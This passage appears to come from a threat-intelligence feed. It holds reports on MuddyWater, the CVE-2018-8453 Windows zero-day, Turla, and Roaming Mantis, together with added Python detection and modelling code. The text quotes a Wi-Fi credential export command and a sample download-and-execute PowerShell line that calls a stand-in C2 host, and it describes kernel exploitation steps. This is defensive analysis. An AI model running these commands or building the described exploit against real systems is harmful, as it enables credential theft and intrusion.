The public IP is then POSTed along with OS Version, Internal IP, Machine Name, Domain Name, UserName after being encrypted to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims depending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC, the victim is assigned an ID $sysid. This ID is sent to the CnC with each request for commands to execute.

Supported commands

“upload”, “screenshot”, “Excel”, “Outlook”, “risk”, “reboot”, “shutdown”, “clean”. These commands vary from one version to another.

  1. The “screenshot” command takes a screenshot that is saved as a .PNG file in “ProgramData”.
  2. The “Excel” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Excel to execute this PowerShell script via DDE.
  3. The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Outlook via COM, via MSHTA.exe, to execute it.
  4. The “risk” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Explorer.exe via COM interaction to execute it.
  5. The “upload” command downloads files from the CnC and saves them locally in “C:\ProgramData“.
  6. The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.
  7. The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.

In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper”, “Panda”, or “ESET”.


Most victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other victims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks suggest they are geopolitically motivated, targeting sensitive personnel and organizations.

Attacker deception and attribution

The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary object (an OLE control, e.g. text box or command button) into a Word document. The paths discovered are:

• C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd
• C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd

Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not entirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule out the possibility of false flags, with the attackers using random usernames to confuse researchers.

In multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the attackers.


Chinese text found in PowerShell code in multiple samples

Unable to connect to the URL, please wait for the dragon…
Unable to access local computer register
Task Scheduler access denied

Translation of Chinese text

We have also noticed that for some samples, e.g. 5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three CnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually be ‘noise’ to distract researchers or trigger false positives.


Recommendations for organizations

Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.

The best way to prevent attackers from finding and leveraging security holes is to eliminate the holes altogether, including those related to improper system configurations or errors in proprietary applications. Organizations are also recommended to implement the following steps for an enhanced level of protection at their premises.

  1. Enforce PowerShell Constrained Language Mode: the MuddyWater scripts rely on IEX (Invoke-Expression), Add-Type and New-Object, and Constrained Language Mode restricts the arbitrary .NET and COM access these constructs give a script.
  2. Lock the PowerShell execution policy: it must be set to “AllSigned” via GPO.
  3. Deploy an application whitelisting solution that can deny specific parent/child process execution chains (for example, a document viewer spawning PowerShell).
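The behaviours described above (a .ps1 written to C:\ProgramData and executed through Explorer, scripts that lean on IEX, Add-Type and New-Object) and the three recommendations translate directly into detection logic. The following is an added example, not code from the original post or from the attackers: it runs simple checks over constructed Sysmon-style process-creation (EventID 1) and file-creation (EventID 11) records. The field names follow Sysmon’s schema, the Office-to-PowerShell chain is an assumed instance of the hierarchies a whitelisting policy would deny, and the sample events are made up for the example.

```python
"""Detection logic for the MuddyWater behaviours described above.

Added example, not code from the original post or the attackers. Input records
are constructed Sysmon-style dictionaries (EventID 1 = process creation,
EventID 11 = file creation); the field names follow Sysmon's schema, the
records themselves are invented for this example.
"""
import re

PROGRAMDATA = "c:\\programdata\\"

# Parent -> child chains an application whitelisting policy would deny.
# The post only says "certain process child-parent execution hierarchies";
# Office -> PowerShell is the assumed instance used here.
DENIED_CHAINS = {
    ("winword.exe", "powershell.exe"),
    ("excel.exe", "powershell.exe"),
}

# Constructs the post names as the reason to enforce Constrained Language Mode.
CLM_SENSITIVE = re.compile(r"(?i)\b(iex|invoke-expression|add-type|new-object)\b")

# A PowerShell script path under C:\ProgramData (the "risk" command drops a.ps1 there).
PROGRAMDATA_PS1 = re.compile(r"(?i)c:\\programdata\\[^\s\"']+\.ps1")


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_process_event(ev):
    """Return the findings for one process-creation record (EventID 1)."""
    findings = []
    parent, child = _base(ev.get("ParentImage", "")), _base(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    if (parent, child) in DENIED_CHAINS:
        findings.append(f"denied chain {parent} -> {child}")
    if child in ("powershell.exe", "pwsh.exe"):
        # explorer.exe -> powershell.exe on its own is ordinary user activity;
        # the script location is what makes the "risk" command stand out.
        m = PROGRAMDATA_PS1.search(cmd)
        if m and parent == "explorer.exe":
            findings.append(f"Explorer launched PowerShell script {m.group(0)}")
        hits = sorted({h.lower() for h in CLM_SENSITIVE.findall(cmd)})
        if hits:
            findings.append("CLM-sensitive constructs on command line: " + ", ".join(hits))
    return findings


def check_file_event(ev):
    """Return the findings for one file-creation record (EventID 11)."""
    target = ev.get("TargetFilename", "")
    if target.lower().startswith(PROGRAMDATA) and target.lower().endswith(".ps1"):
        return [f"PowerShell script dropped in ProgramData: {target}"]
    return []


def scan(events):
    """Run the checks over a sequence of records; returns (EventID, finding) pairs."""
    checks = {1: check_process_event, 11: check_file_event}
    out = []
    for ev in events:
        check = checks.get(ev.get("EventID"))
        for finding in (check(ev) if check else []):
            out.append((ev["EventID"], finding))
    return out


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://c2.example/s')"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\ProgramData\a.ps1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -File "C:\ProgramData\a.ps1"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for event_id, finding in scan(SAMPLE_EVENTS):
        print(event_id, finding)
```

The Explorer check is deliberately conditioned on the script path rather than the parent alone; a bare explorer.exe → powershell.exe rule fires on every interactive PowerShell session and would be tuned out within a day.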

The MuddyWater group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify in the near future.

In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:

  • Educate generic staff to be able to distinguish malicious behavior like phishing links.
  • Educate information security staff to have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as indicators of compromise and YARA rules.
  • Make sure enterprise-grade patch management processes are well established and executed.

High-profile organizations should have elevated levels of cybersecurity: attacks against them are inevitable and are unlikely to ever cease.

Additional information

In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Further details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information is available to customers of Kaspersky Intelligence Reporting. Contact:

Indicators of compromise MD5


File names


Domains, URLs and IP addresses


Zero-day exploit (CVE-2018-8453) used in targeted attacks

Malware Alerts - Wed, 10/10/2018 - 03:00

Yesterday, Microsoft published their security bulletin, which patches CVE-2018-8453, among others. It is a vulnerability in win32k.sys discovered by Kaspersky Lab in August. We reported this vulnerability to Microsoft on August 17, 2018. Microsoft confirmed the vulnerability and designated it CVE-2018-8453.

In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.

So far, we detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoints
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

Kaspersky Lab Verdicts for the artifacts in this campaign are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic

More information about this attack is available to customers of Kaspersky Intelligence Reports. Contact:

Technical details

CVE-2018-8453 is a Use-After-Free inside win32kfull!xxxDestroyWindow that resembles an older vulnerability — CVE-2017-0263. CVE-2017-0263 was originally deployed by the Sofacy APT, together with a PostScript exploit, back in 2017.

For technical analysis of the vulnerability, we completely reverse-engineered the ITW exploit sample obtained and rewrote it into a full Proof of Concept.

The exploitation of this vulnerability depends on a sequence of events that are performed from hooks set on three usermode callback functions – fnDWORD, fnNCDESTROY, and fnINLPCREATESTRUCT. The exploit installs these hooks by replacing the function pointers in the KernelCallbackTable:

Hooked functions in the Kernel Callback Table

Inside the fnINLPCREATESTRUCT hook, the exploit initializes a “SysShadow” window by explicitly assigning a position to it:

Usermode hook on fnINLPCREATESTRUCT initializes SysShadow

When processing the WM_LBUTTONDOWN message, the fnDWORD hook executes the DestroyWindow function on the parent, which results in the window being marked as free and subsequently freed by the garbage collector.

The issue lies inside the fnNCDESTROY hook that runs during execution of the DestroyWindow function. This hook executes the NtUserSetWindowFNID syscall, which contains flawed logic: it changes the fnid status of the window without properly checking whether it is already set to FNID_FREED.

Vulnerable code inside NtUserSetWindowFNID

The fnid status of the window is located at offset 0x02a in the tagWND structure:

kd> dt win32k!tagWND

+0x02a fnid : Uint2B

When the scrollbar is initially created, it has the value FNID_SCROLLBAR (0x029A).

The next diagram shows the value of fnid prior and after execution of the NtUserSetWindowFNID syscall:

Scrollbar fnid prior and after execution of NtUserSetWindowFNID syscall

We can check what the new fnid value is by verifying it against the ReactOS source code:

/* FNIDs for NtUserSetWindowFNID, NtUserMessageCall */
#define FNID_SCROLLBAR 0x029A

#define FNID_BUTTON 0x02A1

#define FNID_FREED 0x8000 /* Window being Freed… */

This action results in the first scrollbar being destroyed, while the system still maintains a reference to a “SysShadow” class, as the scrollbar fnid is no longer marked as FNID_FREED, but as FNID_BUTTON instead.
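The flaw is easier to see as a state machine than as a disassembly. The following is an added example, not the kernel code and not the exploit: it models only the fnid transitions the text describes (FNID_SCROLLBAR at creation, FNID_FREED when DestroyWindow starts, and a hooked fnNCDESTROY callback calling NtUserSetWindowFNID during the destroy), once with the missing FNID_FREED check and once without. The constants are the ReactOS values quoted above; the Window class, the callback plumbing and the “dangling reference” bookkeeping are simplifications made for this example.

```python
"""Model of the fnid logic flaw in NtUserSetWindowFNID described above.

Added example, not the kernel code and not the exploit. Only the state
transitions the post describes are modelled; the constants are the ReactOS
values quoted in the post, everything else is a simplification for this
example.
"""

FNID_SCROLLBAR = 0x029A
FNID_BUTTON = 0x02A1
FNID_FREED = 0x8000


class Window:
    def __init__(self, fnid):
        self.fnid = fnid          # tagWND.fnid (offset 0x02a in the real structure)
        self.pool_freed = False   # whether the backing pool allocation was released


class SetFnidRejected(Exception):
    """Raised by the checked variant when the window is already being freed."""


def nt_user_set_window_fnid(wnd, new_fnid, check_freed):
    """Modelled NtUserSetWindowFNID.

    check_freed=False reproduces the vulnerable logic: the fnid is overwritten
    even when it currently reads FNID_FREED. check_freed=True adds the missing
    check, so a window marked as being freed keeps that marker.
    """
    if check_freed and wnd.fnid & FNID_FREED:
        raise SetFnidRejected(f"fnid 0x{wnd.fnid:04x} has FNID_FREED set")
    wnd.fnid = new_fnid


def destroy_window(wnd, nc_destroy_hook, check_freed):
    """Modelled DestroyWindow: mark the window freed, run the user-mode
    fnNCDESTROY callback (hooked by the exploit), then release the pool block.

    Returns True if a live-looking reference to the freed block remains.
    """
    wnd.fnid = FNID_FREED
    try:
        nc_destroy_hook(wnd, check_freed)
    except SetFnidRejected:
        pass
    wnd.pool_freed = True
    # Anything without FNID_FREED is treated as a live window: if the hook
    # managed to clear the marker, the freed block stays referenced.
    return wnd.pool_freed and not (wnd.fnid & FNID_FREED)


def attacker_hook(wnd, check_freed):
    """What the exploit's fnNCDESTROY hook does: relabel the window as a button."""
    nt_user_set_window_fnid(wnd, FNID_BUTTON, check_freed)


def simulate(check_freed):
    """Run the sequence once; returns (final fnid, dangling reference?)."""
    scrollbar = Window(FNID_SCROLLBAR)
    dangling = destroy_window(scrollbar, attacker_hook, check_freed)
    return scrollbar.fnid, dangling


if __name__ == "__main__":
    print("vulnerable:", simulate(check_freed=False))
    print("checked:   ", simulate(check_freed=True))
```

The point the model makes is that the check has to live inside the syscall, not in DestroyWindow: the callback runs between the FNID_FREED assignment and the actual release, so any state change it can make there is what the rest of the system sees afterwards.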

To successfully reclaim the freed memory pool, the exploit contains a number of different feng shui tactics. The spray procedure is dependent on the exploited Windows version, and because the exploit targets a wide range of operating systems, it includes five separate functions for spraying:

Heap spraying procedures supported in the exploit

For the latest supported version (Windows 10 RS4), the spray tactic is quite complicated. The kernel is sprayed with bitmap objects of different size. This is required to exhaust the memory allocator to eventually bypass the Low Fragmentation Heap security mitigations that were significantly improved in the latest Windows builds:

Heap Feng Shui technique for Windows RS4 17134

This leads to the following memory layout, where USERTAG_SCROLLTRACK is the freed pool allocation:

Freed scrollbar heap allocation

When another scrollbar is allocated, the SysShadow class memory reference is reused, but its contents are attacker-controlled, because the freed Usst (ffffee30044b2a10) and Gpbm (ffffee30044b2a90) pools were merged into a single block:

Freed allocation is merged with the following pool

This results in a powerful arbitrary kernel read/write primitive built on GDI Bitmap objects that works even on the latest Windows versions.

Following successful exploitation, a slightly modified Token-stealing payload is used to swap the current process Token value with the one from the SYSTEM EPROCESS structure:

Modified Token-stealing payload process

So far, we’ve observed the usage of this exploit in a small number of targeted attacks, when the exploit is packaged in a malware installer. The installer requires system privileges to install its payload. The payload is a sophisticated implant, used by the attackers for persistent access to the victims’ machines. Some of its main characteristics include:

  • Encrypting the main payload using AES-256-CBC with the SHA-1 of the SMBIOS UUID as the key material (this makes it impossible to decrypt the payload on a machine other than the victim’s unless the SMBIOS UUID is known; note that a SHA-1 digest is 20 bytes and cannot on its own be a 32-byte AES-256 key, and the post does not say how it is expanded)
  • Using Microsoft BITS (Background Intelligent Transfer Service) for communicating with its C&C servers, an unusual technique (on a suspect host, existing transfer jobs can be enumerated with bitsadmin /list /allusers /verbose or Get-BitsTransfer -AllUsers)
  • Storing the main payload in a randomly named file on disk; the loader contains a hash of the filename and locates the payload by hashing the name of every file in the Windows directory and comparing it against the stored hash

More details on this malware and the APT behind it are available to customers of Kaspersky Intelligence Reporting. Contact:


The distribution of the attack seems to be highly targeted, affecting less than a dozen victims in the Middle East region, according to our telemetry.


During our investigation, we discovered the attackers were using a PowerShell backdoor that has previously been seen exclusively used by the FruityArmor APT. There is also an overlap in the domains used for C2 between this new set of activity and previous FruityArmor campaigns. That makes us assess with medium confidence that FruityArmor is responsible for the attacks leveraging CVE-2018-8453.


Even though deploying 0-days seems to be more frequent than it used to be, this is the second time we have spotted FruityArmor using one to distribute its malware. This points to the resources and sophistication of this actor, along with the advanced final stager they distribute.

So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.

We believe that although FruityArmor’s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar.

Appendix I – Indicators of compromise: Domains:


Shedding Skin – Turla’s Fresh Faces

Malware Alerts - Thu, 10/04/2018 - 12:00

Turla, also known as Venomous Bear, Waterbug, and Uroboros, may be best known for what was at the time an “ultra complex” snake rootkit focused on NATO-related targets, but their malware set and activity is much broader. Our current focus is on more recent and upcoming activity from this APT, which brings an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed.

Much of our 2018 research focused on Turla’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and meterpreter delivery techniques. Also interesting was Mosquito’s changing delivery techniques, customized Posh-SecMod open-source PowerShell use, and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018.

For the first time, our KopiLuwak research identified targets and delivery techniques, bringing more accuracy and reliability to the discussion. Also interesting is a review of Turla scripting artefacts leading to newer efforts like KopiLuwak, tracing back to older scripting in development efforts in WhiteAtlas and WhiteBear. And we find 2018 KopiLuwak delivery techniques that, also for the first time, unexpectedly matched Zebrocy spearphishing techniques.

Also highly interesting and unusual were the MiTM techniques delivering Mosquito backdoors. In all likelihood, Turla had a physical presence of some sort within WiFi range of targets. Download sessions with Adobe’s website were intercepted and injected to deliver Mosquito trojanized installers. This hypothesis is supported by the Mosquito installers’ consistent WiFi credential theft. Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements. We expect to see more Mosquito activity into 2019.

And finally, we discuss the Carbon framework, tying together the older, elegant, and functional codebase sometimes called “Snake lite” with ongoing efforts to selectively monitor high value targets. It appears that the backdoor is pushed with meterpreter now. And, as we see code modifications and deployment in 2018, we predict more development work on this matured codebase along with selective deployment to continue into 2019.

Essentially, we are discussing ongoing activity revolving around several malware families:

  • KopiLuwak and IcedCoffee
  • Carbon
  • Mosquito
  • WhiteBear

Technical Rattle

Turla’s Shifting to Scripting: KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas

Since at least 2015 Turla has leveraged JavaScript, PowerShell, and WSH in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors. The WhiteAtlas framework often utilized a small JavaScript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards. A much more advanced and highly obfuscated JavaScript script was utilized in WhiteAtlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible only for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes.


Turla’s first foray into full-fledged Javascript backdoors began with the usage of the IcedCoffee backdoor that we reported on in our private June 2016 “Ice Turla” report (available to customers of Kaspersky APT Intelligence Services), which led later to their more fully functional and complex, recently deployed, KopiLuwak backdoor. IcedCoffee was initially dropped by exploit-laden RTF documents, then later by macro-enabled Office documents. The macro code used to drop IcedCoffee was a slightly modified version of that found in White Atlas, which is consistent with the code sharing present in many Turla tools. A noteworthy change to the macro code was the addition of a simple web beacon that relayed basic information to Turla controlled servers upon execution of the macro, which not only helped profile the victim but also could be used to track the effectiveness of the attack.

IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server. IcedCoffee has no built-in command capability, instead it may receive javascript files from the C2 server, which are deobfuscated and executed in memory, leaving nothing behind on disk for forensic analysis. IcedCoffee was not widely deployed, rather it was targeted at diplomats, including Ambassadors, of European governments.


In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world). The targeting for this new malware was consistent with earlier Turla operations, focusing on European governments, but it was even more selectively deployed than IcedCoffee.

The KopiLuwak script is decoded by macro code very similar to that previously seen with IcedCoffee, but the resulting script is not the final step. This script is executed with a parameter used as a key to RC4 decrypt an additional layer of javascript that contains the system information collection and command and control beaconing functionality. KopiLuwak performs a more comprehensive system and network reconnaissance collection, and like IcedCoffee leaves very little on disk for investigators to discover other than the base script.

Unlike IcedCoffee, KopiLuwak contains a basic set of command functionality, including the ability to run arbitrary system commands and uninstall itself. In mid-2017 a new version was discovered in which this command set had been further enhanced to include file download and data exfiltration capabilities.

The most recent evolution in the KopiLuwak life cycle was observed in mid-2018 when we observed a very small set of systems in Syria and Afghanistan being targeted with a new delivery vector. In this campaign the KopiLuwak backdoor was encoded and delivered in a Windows shortcut (.lnk) file. The lnk files were an especially interesting development because the PowerShell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier.

Carbon – the long tail

Carbon continues to be deployed against government and foreign affairs related organizations in Central Asia. Carbon targeting in this region has shifted across a few countries since 2014. Here, we find a new orchestrator v3.8.2 and a new injected transport library v4.0.8 deployed to multiple systems. And while we cannot identify a concrete delivery event for the dropper, its appearance coincides with the presence of meterpreter. This meterpreter reliance also coincides with wider Turla use of open source tools that we documented towards the end of 2017 and beginning of 2018.

The Epic Turla operation reported in 2014 involved highly selective Carbon delivery and was a long term global operation that affected hundreds of victims. Only a small portion of these systems were upgraded to a malware set known as “the Carbon framework”, and even fewer received the Snake rootkit for “extreme persistence”. So, Carbon is known to be a sophisticated codebase with a long history and very selective delivery, and coincides with Snake rootkit development and deployment. In light of its age, it’s interesting that this codebase is currently being modified, with additional variants deployed to targets in 2018.

We expect Carbon framework code modifications and predict selective deployment of this matured codebase to continue into 2019 within Central Asia and related remote locations. A complex module like this one must require some effort and investment, and while corresponding loader/injector and lateral movement malware moves to open source, this backdoor package and its infrastructure is likely not going to be replaced altogether in the short term.

.JS attachments deliver Skipper/WhiteAtlas and WhiteBear

We introduced WhiteBear actionable data to our private customers in early 2017, and similar analysis to that report was publicly shared eight months later. Again, it was a cluster of activity that continued to grow past expectations. It is interesting because WhiteBear shared known compromised infrastructure with KopiLuwak: soligro[.]com. WhiteBear scripted spearphish attachments also follow up on the initial WhiteAtlas scripting development and deployment efforts.

Mosquito’s Changing 2018 Delivery Techniques

In March 2018, our private report customers received actionable data on Mosquito’s inclusion of fileless and customized Posh-SecMod metasploit components. When discussion of the group’s metasploit use was made public, their tactics began to change.

The “DllForUserFileLessInstaller” injector module maintained a compilation date of November 22, 2017, and was starting to be used by Mosquito to inject ComRAT modules into memory around January 2018. It is a small piece of metasploit injector code that accounts for issues with Wow64. Also, related open source powershell registry loader code oddly was modified to avoid AES use, and opt for 3DES encryption instead. Here is the modified Mosquito code:

And here is the default Posh-SecMod code that they ripped from:

We expect to see more open-source based or inspired fileless components and memory loaders from Mosquito throughout 2018. Perhaps this malware enhancement indicates that they are more interested in maintaining current access to victim organizations than developing offensive technologies.

MiTM and Ducking the Mosquito Net

We delivered actionable data on Mosquito to our private intel customers in early 2017. Our initial findings included data around an unusual and legitimate download URL for trojanized installers:


While we could not identify the MiTM techniques with accuracy at the time, it is possible either WiFi MiTM or router compromise was used in relation to these incidents. It is unlikely, but possible, that ISP-level FinFisher MiTM was used, considering multiple remote locations across the globe were targeted.

But there is more incident data that should be elaborated on. In some cases, two “.js” files were written to disk and the infected system configured to run them at startup. Their naming provides insight into the intention of this functionality, which is to keep the malware remotely updated via google application, and maintain local settings updates by loading and running “1.txt” at every startup. In a way, this staged script loading technique seems to be shared with the IcedCoffee javascript loading techniques observed in past Turla incidents focused on European government organizations. Updates are provided from the server-side, leading to fewer malware set findings.

  • google_update_checker.js
  • local_update_checker.js

So, we should consider the WiFi data collection that Mosquito Turla performed during these updates, as it hasn’t been documented publicly. One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all of the local host’s WiFi profiles (settings and passwords) to %APPDATA%\<profile>.xml with a command line call:

cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"

They then gather more network information with a call to ipconfig and arp -a. Maintaining ongoing host-based collection of wifi credentials for target networks makes it far easier to possess ongoing access to wifi networks for spoofing and MiTM, as brute-forcing or otherwise cracking weakly secured WiFi networks becomes unnecessary. Perhaps this particular method of location-dependent intrusion and access is on the decline for Mosquito Turla, as we haven’t identified new URLs delivering trojanized code.
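What that netsh call hands over is worth seeing concretely: with key=clear, each exported profile XML carries the network’s passphrase in plaintext in its keyMaterial element (without it, the element holds a DPAPI blob usable only on the exporting host). The following is an added example, not the actor’s code: it flags the export command in a process log and parses an exported profile to list the credentials that left the machine. The element names and namespace are those of the Windows WLAN profile XML format; the profile and command lines are constructed for the example.

```python
"""Triage of what `netsh wlan export profile key=clear` leaves behind.

Added example, not the actor's code. The element names and namespace are those
of Windows WLAN profile XML; the sample profile and command lines are
constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

NS = {"w": "http://www.microsoft.com/networking/WLAN/profile/v1"}

# netsh export of WLAN profiles with cleartext keys, with or without the .exe suffix.
EXPORT_CLEAR = re.compile(r"(?i)\bnetsh(?:\.exe)?\s+wlan\s+export\s+profile\b.*\bkey=clear\b")


def is_wifi_key_export(cmdline: str) -> bool:
    """True for a netsh invocation that exports profiles with cleartext keys."""
    return bool(EXPORT_CLEAR.search(cmdline))


def parse_profile(xml_text: str) -> dict:
    """Pull SSID, security settings and key material out of one exported profile."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path, NS)
        return el.text.strip() if el is not None and el.text else None

    sec = "w:MSM/w:security/"
    return {
        "ssid": text("w:SSIDConfig/w:SSID/w:name"),
        "authentication": text(sec + "w:authEncryption/w:authentication"),
        "encryption": text(sec + "w:authEncryption/w:encryption"),
        "key_protected": text(sec + "w:sharedKey/w:protected"),
        "key_material": text(sec + "w:sharedKey/w:keyMaterial"),
    }


def exposed_credentials(profiles_xml):
    """(ssid, passphrase) pairs for profiles whose key was exported in the clear.

    Without key=clear, <protected> reads 'true' and keyMaterial is a DPAPI blob
    that is only useful on the host that exported it, so those are skipped.
    """
    out = []
    for xml_text in profiles_xml:
        p = parse_profile(xml_text)
        if p["key_material"] and p["key_protected"] == "false":
            out.append((p["ssid"], p["key_material"]))
    return out


# Constructed sample data (not a real profile).
SAMPLE_PROFILE = """<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>CorpGuest</name>
  <SSIDConfig><SSID><name>CorpGuest</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security>
    <authEncryption>
      <authentication>WPA2PSK</authentication>
      <encryption>AES</encryption>
      <useOneX>false</useOneX>
    </authEncryption>
    <sharedKey>
      <keyType>passPhrase</keyType>
      <protected>false</protected>
      <keyMaterial>guest-pass-2018</keyMaterial>
    </sharedKey>
  </security></MSM>
</WLANProfile>"""

SAMPLE_CMDLINES = [
    'cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"',
    "netsh wlan show profiles",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(is_wifi_key_export(c), c)
    print(exposed_credentials([SAMPLE_PROFILE]))
```

The command-line check is a good low-noise rule on its own: legitimate tooling rarely exports profiles with key=clear, and when it does, it is usually an administrator doing it interactively rather than cmd.exe /c from an installer.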

The Next Strike

It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on.

Both Turla’s Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets. While WhiteAtlas and WhiteBear activity stretched across the globe to include foreign affairs related organizations, not all targeting consistently followed this profile. Scientific and technical centers were also targeted, and organizations outside of the political arena came under focus as well. Turla’s KopiLuwak activity does not necessarily focus on diplomatic/foreign affairs, and also winds down a different path. Instead, 2018 activity targeted government related scientific and energy research organizations, and a government related communications organization in Afghanistan. This highly selective but wider targeting set most likely will continue into 2019.

From the targeting perspective, we see closer ties between the KopiLuwak and WhiteBear activity, and closer alignments between Mosquito and Carbon activity.

And WhiteBear and KopiLuwak shared infrastructure while deploying unusual .js scripting. Perhaps open source offensive malware will become much more present in Mosquito and Carbon attacks as we see more meterpreter and injector code, while more uniquely innovative complex malware will continue to be distributed with KopiLuwak and a possible return of WhiteBear. And as we see with techniques borrowed from the earlier Zebrocy spearphishing, techniques are sometimes passed around and duplicated.

CEO Fraud

SANS Tip of the Day - Thu, 10/04/2018 - 01:00
CEO Fraud / BEC is a type of targeted attack. It commonly involves a cyber criminal pretending to be your boss, then tricking or fooling you into sending the criminal highly sensitive information or initiating a wire transfer. Be highly suspicious of any emails demanding immediate action and/or asking you to bypass any security procedures.

Roaming Mantis part III: iOS crypto-mining and spreading via malicious content delivery system

Malware Alerts - Mon, 10/01/2018 - 06:00

In Q2 2018, Kaspersky Lab published two blogposts about Roaming Mantis sharing details of this new cybercriminal campaign. Initially, the criminals used DNS hijacking in vulnerable routers to spread malicious Android applications of Roaming Mantis (aka MoqHao and XLoader), spoofing legitimate applications such as Facebook and Chrome. During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly. The group’s malware now supports 27 languages, covering countries in Asia and beyond, Europe and the Middle East. In addition, they have started using web crypto-mining for PC, and an Apple phishing page for iOS devices.

You can check previous chapters of this research here:

